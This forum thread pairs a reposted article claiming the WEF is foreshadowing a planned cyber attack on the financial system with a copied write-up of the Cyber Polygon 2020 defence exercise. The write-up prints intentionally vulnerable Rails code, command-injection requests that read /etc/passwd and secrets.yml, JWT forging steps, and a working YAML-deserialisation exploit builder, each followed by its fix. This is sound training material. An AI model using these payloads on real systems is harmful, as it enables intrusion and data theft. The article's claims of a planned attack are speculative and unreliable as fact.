+ Reply to Thread
Results 1 to 7 of 7

Thread: WEF planning cyber attack on financial system?

  1. Link to Post #1
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    1,821
    Thanks
    1,336
    Thanked 7,816 times in 1,607 posts

    Default WEF planning cyber attack on financial system?

    Like covid, they are announcing it head of time:

    https://www.activistpost.com/2021/04...al-system.html

    Better have some physical cash on hand.

    Admin editorial: this is a Whitney Webb article; she's amongst the very best independent researchers and journalists we have and her work here deserves to be placed right up-front. This isn't new news of course - it's been covered on the forum elsewhere, and discussed - Tintin.

    WEF Warns of Cyber Attack Leading to Systemic Collapse of the Global Financial System

    APRIL 7, 2021
    By Whitney Webb



    A report published last year by the WEF-Carnegie Cyber Policy Initiative calls for the merging of Wall Street banks, their regulators and intelligence agencies as necessary to confront an allegedly imminent cyber attack that will collapse the existing financial system.

    In November 2020, the World Economic Forum (WEF) and Carnegie Endowment for International Peace co-produced a report that warned that the global financial system was increasingly vulnerable to cyber attacks. Advisors to the group that produced the report included representatives from the Federal Reserve, the Bank of England, the International Monetary Fund, Wall Street giants likes JP Morgan Chase and Silicon Valley behemoths like Amazon.

    The ominous report was published just months after the World Economic Forum had conducted a simulation of that very event – a cyber attack that brings the global financial system to its knees – in partnership with Russia’s largest bank, which is due to jumpstart that country’s economic “digital transformation” with the launch of its own central bank-backed digital currency.

    More recently, last Tuesday, the largest information sharing organization of the financial industry, whose known members include Bank of America, Wells Fargo and CitiGroup, have again warned that nation-state hackers and cybercriminals were poised to work together to attack the global financial system in the short term. The CEO of this organization, known as the Financial Services Information Sharing and Analysis Center (FS-ISAC), had previously advised the WEF-Carnegie report that had warned much the same.

    Such coordinated simulations and warnings from those who dominate the current, ailing financial system are obvious cause for concern, particularly given that the World Economic Forum is well known for its Event 201 simulation about a global coronavirus pandemic that took place just months prior to the COVID-19 crisis.

    The COVID-19 crisis has since been cited as the main justification for accelerating the “digital transformation” of the financial and other sectors that the Forum and its partners have promoted for years. Their latest prediction of a doomsday event, a cyber attack that stops the current financial system in its tracks and instigates its systemic collapse, would offer the final yet necessary step for the Forum’s desired outcome of this widespread shift to digital currency and increased global governance of the international economy.

    Given that experts have been warning since the last global financial crisis that the collapse of the entire system was inevitable due to central bank mismanagement and rampant Wall Street corruption, a cyber attack would also provide the perfect scenario for dismantling the current, failing system as it would absolve central banks and corrupt financial institutions of any responsibility. It would also provide a justification for incredibly troubling policies promoted by the WEF-Carnegie report, such as a greater fusion of intelligence agencies and banks in order to better “protect” critical financial infrastructure.

    Considering the precedent of the WEF’s past simulations and reports with the COVID-19 crisis, it is well worth examining the simulations, warnings and the policies promoted by these powerful organizations. The remainder of this article will examine the WEF-Carnegie report from November 2020, while a follow-up report will focus on the more recent FS-ISAC report published last week. The WEF simulation of a cyber attack on the global financial system, Cyber Polygon 2020, was covered in detail by Unlimited Hangout in a previous report.

    The WEF-Carnegie Cyber Policy Initiative

    The Carnegie Endowment for International Peace, is one of the most influential foreign policy think tanks in the United States, with close and persistent ties to the US State Department, former Presidents, corporate America and American oligarch clans like the Pritzkers of Hyatt hotels. Current trustees of the endowment include executives from Bank of America and CitiGroup as well as other influential financial institutions.

    In 2019, the same year as Event 201, the Endowment launched its Cyber Policy Initiative with the goal of producing an “International Strategy for Cybersecurity and the Global Financial System 2021-2024.” That strategy was released just months ago, in November 2020 and, according to the Endowment, was authored by “leading experts in governments, central banks, industry and the technical community” in order to provide a “longer-term international cybersecurity strategy” specifically for the financial system.

    The initiative is an outgrowth of past efforts of the Carnegie Endowment to promote the fusion of financial authorities, the financial industry, law enforcement and national security agencies, which is both a major recommendation of the November 2020 report and a conclusion of a 2019 “high-level roundtable” between the Endowment, the IMF and central bank governors. The Endowment had also partnered with the IMF, SWIFT, Standard Chartered and FS-ISAC to create a “cyber resilience capacity-building tool box” for financial institutions in 2019. That same year, the Endowment also began tracking “the evolution of the cyber threat landscape and incidents involving financial institutions” in collaboration with BAE Systems, the UK’s largest weapons manufacturer. Per the Endowment, this collaboration continues into the present.

    In January 2020, representatives of the Carnegie Endowment presented their Cyber Policy Initiative at the annual meeting of the World Economic Forum, after which the Forum officially partnered with the Endowment on the initiative.

    Advisors to the now joint WEF-Carnegie project include representatives of central banks like the US Federal Reserve and the European Central Bank; some of Wall Street’s most infamous banks like Bank of America and JP Morgan Chase; law enforcement organizations such as INTERPOL and the US Secret Service; corporate giants like Amazon and Accenture; and global financial institutions like the International Monetary Fund (IMF) and SWIFT. Other notable advisors include the managing director and head of the WEF’s Centre for Cybersecurity, Jeremy Jurgens, who was also a key player in the Cyber Polygon simulation, and Steve Silberstein, the CEO of the Financial Services Information Sharing and Analysis Center (FS-ISAC).

    “Not a Question of If but When“

    The Cyber Policy Initiative’s November 2020 report is officially titled “International Strategy to Better Protect the Financial System.” It begins by noting that the global financial system, like many other systems, are “going through unprecedented digital transformation, which is being accelerated by the coronavirus pandemic.”

    It then warns that:
    “Malicious actors are taking advantage of this digital transformation and pose a growing threat to the global financial system, financial stability, and confidence in the integrity of the financial system. Malign actors are using cyber capabilities to steal from, disrupt, or otherwise threaten financial institutions, investors and the public. These actors include not only increasingly daring criminals, but also states and state-sponsored attackers.”
    Followed by this warning of “malign actors”, the report notes that “increasingly concerned, key voices are sounding the alarm.” It notes that Christine Lagarde of the European Central Bank and formerly of the IMF warned in February 2020 that “a cyber attack could trigger a serious financial crisis.” A year prior, at the WEF’s annual meeting, the head of Japan’s central bank predicted that “cybersecurity could become the financial system’s most serious risk in the near future.” It also notes that in 2019, Jamie Dimon of JP Morgan Chase similarly labeled cyber attacks as possibly “the biggest threat to the US financial system.”

    Not long after Lagarde’s warning, in April 2020, the Financial Stability Board asserted that “cyber incidents pose a threat to the stability of the global financial system” and that “a major cyber incident, if not properly contained, could seriously disrupt financial systems, including critical financial infrastructure, leading to broader financial stability implications.”

    The WEF-Carnegie report authors add to these concerns that “the exploitation of cyber vulnerabilities could cause losses to investors and the general public” and lead to significant damage to public trust and confidence in the current financial system. It also notes, aside from affecting the general public in a significant way, this threat would impact both high-income countries and low to lower-middle income countries, meaning its impact on the masses will be global in scope.

    The report then ominously concludes that “one thing is clear: it is not a question of if a major incident will happen, but when.“

    Ensuring control of the narrative

    Another section of the report details recommendations for controlling the narrative in the event such a crippling cyber attack takes place. The report specifically recommends that “financial authorities and industry should ensure they are properly prepared for influence operations and hybrid attacks that combine influence operations with malicious hacking activity” and that they “apply lessons learned from influence operations targeting electoral processes to potential attacks on financial institutions.”

    It goes on to recommend that “major financial services firms, central banks and other financial supervisory authorities”, representatives of which advised the WEF-Carnegie report, “identify a single point of contact within each organisation to engage social media platforms for crisis management.”

    The report’s authors argue that, “in the event of a crisis,” such as a devastating cyber attack on the global banking system, “social media companies should swiftly amplify communications by central banks” so that central banks may “debunk fake information” and “calm the the markets.” It also states that “financial authorities, financial services firms and tech companies [presumably including social media companies] should develop a clear communications and response plan focused on being able to react swiftly.” Notably, both Facebook and Twitter are listed in the report’s appendix as “industry stakeholders” that have “engaged” with the WEF-Carnegie initiative.

    The report also asserts that premeditated coordination for such a crisis between banks and social media companies needs to take place so that both parties may “determine what severity of crisis would necessitate amplified communication.” The report also calls for social media companies to work with central banks to “develop escalation paths similar to those developed in the wake of the past election interference, as seen in the United States and Europe.”

    Of course, those “escalation paths” involved wide-ranging social media censorship. The report seems to acknowledge this, when it adds that “quick coordination with social media platforms is necessary to organise content takedowns.” Thus, the report is calling for central banks to collude with social media platforms to plan out censorship efforts that would be enacted if a sufficiently severe crisis occurs in financial markets.

    As far as “influence operations” go, the report divides these into two categories; those that target individual firms and those that target markets overall. Regarding the first category, the report states that “organised actors will spread fraudulent rumours to manipulate stock prices and generate profit based on how much the price of the stock was artificially moved.” It then adds that, in these influence operations, “firms and lobbyists use astroturfing campaigns, which create a false appearance of grassroots support, to tarnish the value of a competing brand or attempt to sway policymaking decisions by abusing calls for online public comments.” The similarities between this latter statement and the Wall Street Bets phenomenon of January 2021 are obvious.

    Regarding the second category of “influence operations,” the report defines these operations as “likely to be carried out by a politically motivated actor like a terrorist group or even a nation-state.” It adds that “this type of influence operation may directly target the financial system to manipulate markets, for example, by spreading rumours about market-moving decisions by central banks” as well as spreading “false information that does not directly reference financial markets but that causes financial markets to react.”

    Given that the report states that the first category of influence operation poses little systemic risk while the second “may pose systemic risk”, it seems more likely that the event being predicted by the WEF-Carnegie report would involve claims of the latter by a “terrorist group” or potentially a nation-state. Notably, the report mentions North Korea as a likely nation-state offender on several occasions. It also dwells on the likelihood that synthetic media or “deep fakes” would be part of this system-devastating event in emerging economies and/or in high-income countries experiencing a financial crisis.

    A separate June 2020 report from the WEF-Carnegie initiative was published specifically on deepfakes and the financial system, noting that such attacks would likely transpire during a larger financial crisis to “amplify” damaging narratives or “simulate grassroots consumer backlash against a targeted brand.” It adds that “companies, financial institutions and government regulators facing public relations crises are especially vulnerable to deepfakes and synthetic media.”

    In light of these statements, it is worth pointing out that bad actors within the current system could exploit these scenarios and theories to paint actual grassroots backlash against a bank or corporation as being a synthetic “influence operation” perpetrated by “cybercriminals” or a nation-state. Considering that the WEF-Carnegie report references a scenario analogous to the Wall Street Bets situation in January 2021, a banker-led effort to falsely label a future grassroots backlash as instead being synthetic and the fault of a “terrorist group” or nation-state should not be ruled out.

    “Reducing Fragmentation”: Merging Banks with their Regulators and Intelligence Agencies

    Given the inevitability of this destructive event predicted by the report’s authors, it is important to focus in on the solutions proposed in the WEF-Carnegie report as they will become immediately relevant if this event, as predicted by the WEF and Carnegie Endowment, does come to pass.

    Some of the solutions proposed are to be expected from a WEF-linked policy document, such as the calls for increased public-private partnerships and greater coordination among regional and international organizations as well as increased coordination between national governments.

    However, the main “solution” at the heart of this report, and also at the heart of the WEF-Carnegie initiative’s other endeavors, is a call to fuse corporate banks, the financial authorities that essentially oversee them, tech companies and the national security state.

    The report’s authors first argue that the main vulnerability of the global financial system at present is “the current fragmentation among stakeholders and initiatives” and that mitigating this threat to global system lies in reducing that “fragmentation.” The report argues that the way to resolve the issue requires massive re-organization of all “stakeholders” via increased global coordination. The report notes that the “disconnect between the finance, the national security and the diplomatic communities is particularly pronounced” and calls for much closer interaction between the three.

    It then states that:

    “This requires countries not only to better organize themselves domestically but also to strengthen international cooperation to defend against, investigate, prosecute and ideally prevent future attacks. This implies that the financial sector and financial authorities must regularly interact with law enforcement and other national security agencies in unprecedented ways, both domestically and internationally.”


    Some examples of these “unprecedented interactions” between banks and the national security state are included in the report’s recommendations. For instance, it argues that “governments should use the unique capabilities of their national security communities to help protect FMIs [financial market infrastructures] and critical trading systems.” It also calls for “national security agencies [to] consult critical cloud service providers [like WEF-Carnegie initiative partner Amazon Web Services] to determine how intelligence collection could be used to help identify and monitor potential significant threat actors and develop a mechanism to share information about imminent threats” with tech companies.

    The report also states that “the financial industry should throw its weight behind efforts to tackle cyber crime more effectively, for example by increasing its participation in law enforcement efforts.”

    On that last point, there are indications this has already begun. For instance, Bank of America, the second largest bank in the US and part of the WEF-Carnegie Initiative and FS-ISAC, was reported to have “actively but secretly engaged” with US law enforcement agencies in the hunt for “political extremists” following the January 6th events at Capitol Hill. In doing so, Bank of America shared private information with the federal government without the knowledge or consent of its customers, leading critics to accuse the bank of “effectively acting as an intelligence agency.”

    Yet, arguably the most troubling part of the report is its call to unite the national security apparatus and the finance industry first, and then use that as a model to do the same with other sectors of the economy. It states that “protecting the international financial system can be a model for other sectors,” adding that “focusing on the financial sector provides a starting point and could pave the way to better protect other sectors in the future.”

    Were all the sectors of the economy to also fuse with the national security state, it would inevitably create a reality where there is no part of daily human life that is not ultimately controlled by these two already very powerful entities. This is a clear recipe for techno-fascism on a global scale. As this WEF-Carnegie report makes clear, the roadmap regarding how to cook up such a nightmare has already been charted out in coordination with the very institutions, banks and governments that currently control the global financial system.

    Not only that, but – as pointed out in Unlimited Hangout’s article on Cyber Polygon – the World Economic Forum and many of its partners have a vested interest in the systemic collapse of the current financial system. In addition, many central banks have recently backed new digital currency systems that can only achieve rapid, mass adoption if the existing system collapses.

    Given that these systems are set to be integrated with biometric IDs and so-called “vaccine passports” through the WEF and Big Tech-backed Vaccine Credential initiative, it is worth considering the timing of the expected launch of such systems in determining when this predicted and allegedly inevitable event is likely to occur.

    With this new financial system so deeply inter-connected to these “credential” efforts, this cyber attack on the financial sector would likely take place at a time when it would best facilitate the adoption of the new economic system and its integration into credential systems currently being promoted as a “way out” of COVID-19-related restrictions.

    Source: The Last American Vagabond

    ---------------------

    Whitney Webb is a staff writer for The Last American Vagabond. She has previously written for Mintpress News, Ben Swann’s Truth In Media. Her work has appeared on Global Research, the Ron Paul Institute and 21st Century Wire, among others. She currently lives with her family in southern Chile.

    https://www.thelastamericanvagabond..../whitney-webb/

    _______________

    Carnegie report: International Strategy to Better Protect the Financial System Against Cyber Attacks -
    - Maurer + Nelson (document runs to 242 pages and too large to embed here)
    Last edited by Tintin; 8th April 2021 at 09:54.

  2. The Following 22 Users Say Thank You to TomKat For This Post:

    Ba-ba-Ra (8th April 2021), bennycog (8th April 2021), Bill Ryan (8th April 2021), DeDukshyn (8th April 2021), Dick (8th April 2021), gord (8th April 2021), Harmony (8th April 2021), Ioneo (8th April 2021), Miha (8th April 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), onevoice (8th April 2021), palehorse (8th April 2021), Sadieblue (8th April 2021), Snoweagle (8th April 2021), Sunny (8th April 2021), T Smith (13th April 2021), Tintin (8th April 2021), toppy (8th April 2021), Valle (8th April 2021), Violet3 (8th April 2021), Yoda (8th April 2021)

  3. Link to Post #2
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Trowbridge/Bath - UK
    Age
    51
    Posts
    3,077
    Thanks
    29,055
    Thanked 21,745 times in 3,047 posts

    Default "Cyber Polygon" Simulation Exercise - July 2020

    We of course all know where these 'simulation' exercises lead.

    Forgive the inclusion here of the coding from their site, but, for the super-smart of you out there who understand code well, may find something of interest there. It's a direct copy/paste from their site and I think may prove interesting.

    And we don't give the geekier ones of you anywhere near enough to possibly feed on . Do note that the appearance of emojis part way through some of the code is a result obviously of eg colon + p being used in the code.

    ---------------------------------------------------------

    Overview from website:
    Cyber Polygon 2020
    In 2020, the live stream gathered 5 million spectators from 57 nations. The event featured the world’s leaders and renowned experts, including Mikhail Mishustin, Prime Minister of the Russian Federation, Klaus Schwab, Founder and Executive Chairman, World Economic Forum, top officials from INTERPOL, ICANN, Visa, IBM, Sber, MTS and other organisations.

    The technical exercise attracted 120 of the largest enterprises from 29 countries. These included financial, healthcare and educational institutions, state and law enforcement agencies, energy suppliers, companies from IT, metal, telecom, chemical, aerospace engineering and other sectors.
    -----------------------

    Defence Scenario: Cyber Polygon 2020 Technical Exercise Write-up -https://2020.cyberpolygon.com/materi...-polygon-2020/

    On 8 July 2020, Cyber Polygon — an international online cybersecurity training — took place for the second time. The technical exercise was attended by 120 teams from some of the largest Russian and international organisations across 29 countries. Among the participants were: banks, telecom providers, energy suppliers, medical institutions, universities as well as government and law enforcement agencies.

    The participants acting as Blue Teams had to defend their segments of the training infrastructure. The organisers (BI.ZONE) acted as the Red Team and simulated the cyberattacks.

    The exercise included two scenarios: Defence and Response

    This article goes into details of the Defence scenario, where the participants had to repel an attack conducted by the Red Team, and covers the following topics:

    - basic game mechanics
    - infrastructure and game service provided to the participants
    - vulnerabilities embedded in the services
    - exploitation scenarios and attack detection methods
    - vulnerability remediation methods

    Legend
    According to the legend, the organisation’s virtual infrastructure included a service which processed confidential client information. This service became the subject of interest to an APT group. Cybercriminals were going to steal confidential user data and then resell it on the Darknet in order to receive a financial benefit and cause damage to company reputation.

    The APT group studied the target system in advance and discovered several critical vulnerabilities. The gang launched the attack on the day of the exercise.

    The Blue Teams had to:

    - contain the attack as fast as possible
    - minimise the amount of information stolen
    - maintain the service availability
    - The participants could apply any available and familiar methods and tools to
    protect the infrastructure.

    Core Mechanics
    The team members who had participated in Attack-Defenсe CTF may have noticed some similarities between this format of cybersecurity competition and the scenario being described. However, during the Cyber Polygon training, the participants were not expected to attack each other — all they had to do was protect their own services.

    This rule was introduced to ensure that all the participants were on an equal playing field and could focus on improving their defensive skills. Besides, it enabled a more objective assessment of the teams’ skills due to more accurate quantitative metrics.

    The following indicators were used as metrics:

    Health Points (HP). A simple numerical value. Every time when the Red Team successfully exploited a vulnerability in the Blue Team’s services and captured the flag, the Blue Team lost HP. The more vulnerabilities the Red Team was able to exploit, the more HP the team lost. HP was deducted once per round.

    Service Level Agreement (SLA). In the context of this scenario, SLA indicated the integrity and accessibility of a service. It was measured as a percentage (0–100%). The defending team lost SLA points if the service was made unavailable or malfunctioned at the moment the checker contacted it. The checker could access any service several times per round, but each team’s services were checked an equal number of times. The resulting SLA was calculated as the percentage of successful checks (when the service was available and fully functional) to the total number of checks.

    Checker is the mechanics that allowed the organisers to check if the teams’ services were fully functional. Since the game service simulated a real web application, the checker was also used to ensure compliance with the rules of the game: the participants could not simply turn off the service or disable some of its features, all they could do was defend their segments against Red Team attacks.

    The final score for the scenarios was calculated as SLA * HP.

    The participants were given 30 minutes for preparation, i.e. they were supposed to familiarise themselves with the service provided, roll out monitoring and defensive tools and start searching for vulnerabilities in the service code.

    After the 30 minutes began the so-called ’active phase’ of the scenario: the Red Team started their attack. The active phase consisted of 18 rounds, 5 minutes each.

    Before the start of the scenario, each team received 180 HP for each of the 5 vulnerabilities embedded in the service (900 HP in total). The team lost 10 HP for each vulnerability exploited. Thus, if the team had 3 vulnerabilities exploited during a round, it lost a total of 30 HP in this round, and if 5 vulnerabilities were exploited — 50 HP respectively.

    Apart from controlling the availability of the teams’ services, the checker was used to deliver the so-called flag to the teams’ services at the beginning of each round (using legitimate service functions). Flag is a ‘Polygon{JWT}’ format string, where JWT stands for JSON Web Token.

    In this scenario, the flag represented confidential data: the more flags the Red Team was able to steal, the more data was leaked. A stolen flag also meant the exploitation of a vulnerability: the team lost HP once the Red Team took advantage of a vulnerability and grabbed the flag.


    Infrastructure and Game Service
    Each participating team was provided with a virtual server running the Linux operating system.

    After connecting via VPN, the participants got access to their server through SSH. The teams were granted full (root) access to their system.

    The participants’ game service was available from the user’s home directory /home/cyberpolygon/ch4ng3org.

    The game service backend was written in Ruby, while the frontend used the React JS framework. The database was managed by the PostgreSQL DBMS.

    The service was designed to be rolled out on Docker, which was evident from its directory: for instance, it contained such files as Dockerfile and docker-compose.yml.

    The participants had full access to the service’s source codes, configuration files and the database, and could use this information to search for and fix vulnerabilities in the service.


    Vulnerabilities
    Insecure Direct Object References

    The vulnerability referred to as insecure direct object reference (IDOR) is caused by flaws in authorisation mechanisms. The vulnerability allows an attacker to gain access to otherwise inaccessible user data.

    This vulnerability was present in the game service under the get method of the UsersController class.

    backend/app/controllers/users_controller.rb:
    >
    def get
    user = User.find(params[:id])
    if params[:full].present?
    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: user.phone
    })
    else
    json_response({
    id: user.id,
    name: user.name
    })
    end
    end
    When calling the address http://example.com/api/users/<USER_ID>, where USER_ID is a numeric user identifier, any user could get a JSON object containing a numeric identifier and a username corresponding to that numeric identifier.

    This functionality as such does not pose any threat to user data. You should rather focus on the following code snippet:
    >
    if params[:full].present?
    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: user.phone
    })
    Note that if the full parameter is transmitted in a request, the server response will return more data: in addition to the user ID and username, it will contain their email and phone number.

    The flags were stored in and could be stolen from the user.phone field in the game service’s directory (this activity could be detected, for example, by analysing the network traffic). Each round, the checker created several users and saved the flag as one of such users’ phone number.

    In order to take advantage of this weakness, the Red Team sent requests like http://example.com/api/users/<USER_ID>?full=1 to the service and searched for the flag in the phone field of the output JSON objects.

    To protect against this vulnerability, it would be good practice to obscure sensitive data when displaying it to the user. Thus, the phone number +71112223344 can be shown as +7111*****44.

    For example:
    >
    def get
    user = User.find(params[:id])
    if params[:full].present?
    # Masking user's phone number
    uphone = user.phone
    x = 5
    y = uphone.length - 3
    replacement = '*'*(y-x)
    uphone[x..y] = replacement

    json_response({
    id: user.id,
    name: user.name,
    email: user.email,
    phone: uphone
    })
    else
    json_response({
    id: user.id,
    name: user.name
    })
    end
    end
    In this case, the Red Team would have got a line like Polyg********X} instead of the full flag value and the participating team could have avoided losing HP due to this vulnerability being exploited.


    Command Injection
    Command injection is the result of inadequate filtering of user data. This vulnerability enables an attacker to inject OS commands that are executed on the target system with the privileges of the vulnerable application.

    In the game service, the vulnerability was present in the disk_stats method of the StatsController class.

    backend/app/controllers/stats_controller.rb:

    def disk_stats
    if params[:flags].present?
    flags = params[:flags]
    else
    flags = ''
    end

    json_response({
    disk: `df #{flags}`
    })
    end

    When calling the address http://example.com/api/disk_stats, the service responds with the output system df utility in the JSON object disk field, which allows to evaluate the amount of free space in the file system.

    The command being called was designed to transmit various parameters, but their value is not filtered out:

    >
    if params[:flags].present?
    flags = params[:flags]
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    json_response({
    disk: `df #{flags}`
    })
    This means that a potential attacker can execute virtually any command in the system using special command-line syntax.

    For example, by running a request http://example.com/api/disk_stats?flags=;cat /etc/passwd a threat actor will be able to read the contents of system file /etc/passwd.

    This is how the Red Team exploited this weakness:

    By sending a request http://example.com/api/disk_stats?flags=>dev/null;cat config/secrets.yml, the attackers obtained the contents of the backend/config/secrets.yml file, which stored the private key for signing JWT tokens.

    Having obtained the private key, the Red Team could generate and sign a JWT token valid for any user. Given that the Red Team used the current private key of the service, this token would have been successfully validated and accepted by the application.

    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, a sufficient measure was to prohibit any parameters from being injected in the command call, as the overall system performance is not tied to this endpoint being used:

    def disk_stats
    json_response({
    disk: `df`
    })
    end

    Security Misconfiguration
    The vulnerability known as security misconfiguration is usually caused by a human factor. Standard application configurations are often not specifically geared towards security. Due to the lack of proactivity, attention or competence of responsible staff, these configurations sometimes remain unadapted to harsh realities which comes with significant security implications.

    The game service had this vulnerability embedded in the db service description, in the docker-compose.yml file.
    docker-compose.yml:


    db:
    image: postgres
    restart: always
    network_mode: bridge
    volumes:
    - ./db_data:/var/lib/postgresql/data
    ports:
    - 5432:5432
    environment:
    POSTGRES_DB: ch4ng3
    POSTGRES_USER: ch4ng3
    POSTGRES_PASSWORD: ch4ng3
    As you can see, the network port of the database is available from the external network:

    ports:
    - 5432:5432
    Besides, the database server uses one and the same line as a database name, username and password, which also matches the service ch4ng3.org.

    Having detected the database port as a result of network scanning, the Red Team was able to brute-force the login and password to the database. It then executed an SQL statement below, which returned all user phone numbers with flags inside:


    SELECT phone FROM users WHERE phone LIKE 'Polygon%'
    To protect against this vulnerability, the ideal solution would have been to prohibit the database from being connected externally and to change the database user password (with the api service reconfigured accordingly):

    db:
    image: postgres
    restart: always
    network_mode: bridge
    volumes:
    - ./db_data:/var/lib/postgresql/data
    environment:
    POSTGRES_DB: ch4ng3
    POSTGRES_USER: ch4ng3
    POSTGRES_PASSWORD: <VERY_SECRET_PASSWORD>

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    environment:
    - DATABASE_URL=postgres://ch4ng3:<VERY_SECRET_PASSWORD>@db:5432/ch4ng3?sslmode=disable
    However, one of the two actions would have sufficed: either changing the database user password to a stronger one or prohibiting database connections from the external network.


    JWT Signature Algorithm Change
    The next vulnerability buried in the game service related to JWT signature algorithm change.

    It was present in the decode method of the JsonWebToken class.

    backend/app/lib/json_web_token.rb:

    def self.decode(token, algorithm)
    # cannot store key as ruby object in yaml file
    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
    # raise custom error to be handled by custom handler
    raise ExceptionHandler::InvalidToken, e.message
    end
    The following lines deserve a closer look:

    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    The application loads the line with the service public key from the configuration file and, where an RS256 algorithm has been transmitted in the token, converts that line to an RSA public key, which is further used to verify the token signature.

    Note that if any other value is transmitted in the algorithm parameter, the public key line will not be converted. If the HS256 value is sent to the alg JWT field, the HMAC symmetric algorithm will be used for token signature verification, and exactly this public key line will be used as a key to verify the token signature.

    This is how this weakness was exploited by the Red Team:

    By sending a request http://example.com/api/auth/third_party, the attackers received the service public key from the public_key field of the output JSON object.
    Having obtained the public key, the Red Team could generate a valid JWT token for any user by sending the HS256 value to the alg JWT field and signing the token, with the service public key line used as a secret for the HMAC algorithm.
    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, the following recommendation could have helped: when working with JWT, you better use only one signature algorithm at a time — either symmetric or asymmetric. Thus, the easiest fix would be:

    backend/app/lib/json_web_token.rb:


    def self.decode(token, algorithm)
    # cannot store key as ruby object in yaml file
    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
    public_key = OpenSSL:Key::RSA.new(public_key)
    else
    raise ExceptionHandler::InvalidToken, Message.invalid_token
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
    HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
    # raise custom error to be handled by custom handler
    raise ExceptionHandler::InvalidToken, e.message
    end


    Now, if you send a value other than RS256 to the token’s alg field, the token will be marked as invalid and the Red Team will not be able to access the application on behalf of other users by signing tokens with the service public key.


    YAML Insecure Deserialisation
    The last vulnerability embedded in the game service was associated with YAML insecure deserialisation.

    The import method of the PetitionsController class was responsible for importing petitions through their YAML-format description.

    backend/app/controllers/petitions_controller.rb:

    def import
    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    rescue => e
    json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
    return
    end
    if petition['created_at']
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
    else
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
    end
    petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
    json_response(petition)
    end
    Particular attention should have been given to the following code lines:


    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    As you may have noticed, the contents of a YAML object are taken from the base64-coded petition parameter and then converted into Ruby objects using the YAML.load(yaml) structure.

    This structure is insecure and allows, among other things, arbitrary Ruby code execution on the target system within the vulnerable application, which is what the Red Team did.

    The following script was used to generate a YAML object to take advantage of this weakness:


    require "erb"
    require "base64"
    require "active_support"

    if ARGV.empty?
    puts "Usage: exploit_builder.rb <source_file>"
    exit!
    end

    erb = ERB.allocate
    erb.instance_variable_set :@src, File.read(ARGV.first)
    erb.instance_variable_set :@lineno, 1

    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result

    payload = Base64.encode64(Marshal.dump(depr))

    puts <<-PAYLOAD
    ---
    !ruby/object:Gem::Requirement
    requirements:
    - !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
    env:
    rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
    loaded: true
    HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
    coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
    key: a
    secrets: []
    exists: true

    PAYLOAD
    The following code was applied as the payload:

    phones = ''
    User.all().each do |user|
    phones += user.phone + ';'
    end
    raise phones
    The code received the phone numbers of all users registered with the service, combined them through ( and applied the raise structure to cause an exception, sending the line with the users’ phone numbers as an error message.

    The error message was then returned by the server to the JSON object message field together with the response code 500. Once the Red Team received this response, all it had to do was locate the flag in the error message.

    To protect against this vulnerability, it was sufficient to replace the call of the YAML.load(yaml) function with the call of the YAML.safe_load(yaml) function. However, during the availability check, the checker verified that the transmitted YAML object allowed for aliases to be applied. Hence, the resulting structure is represented as follows: YAML.safe_load(yaml, aliases: true).

    And the resulting secure function accordingly:

    def import
    yaml = Base64.decode64(params[etition])
    begin
    petition = YAML.safe_load(yaml, aliases: true)
    rescue Psych::SyntaxError => e
    json_response({message: e.message}, 500)
    return
    rescue => e
    json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
    return
    end
    if petition['created_at']
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
    else
    petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
    end
    petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
    json_response(petition)
    end
    Conclusion
    In our article, we explored the vulnerabilities implanted in Cyber Polygon’s Defence scenario game service, analysed the applied exploitation scenarios and gave examples of remediation that would have allowed the participants to protect their services against the Red Team.

    We would use the patch methods from the examples in a real-life situation. However, you should keep in mind that these are not the only possible effective methods.

    The scenario assumed that the participants would be able to defend themselves without having to patch the code in their game services. For example, to protect against the third vulnerability — security misconfiguration, which is associated with an insecure Docker configuration, it was sufficient to block the database port on the firewall.

    However, we believe that the best solution is to remediate the flaws in services and applications rather than resorting to ’palliative’ measures, which sooner or later may not be sufficient to withstand an attack. This is why we examined in detail the source code corrections as a means to protect against vulnerabilities.

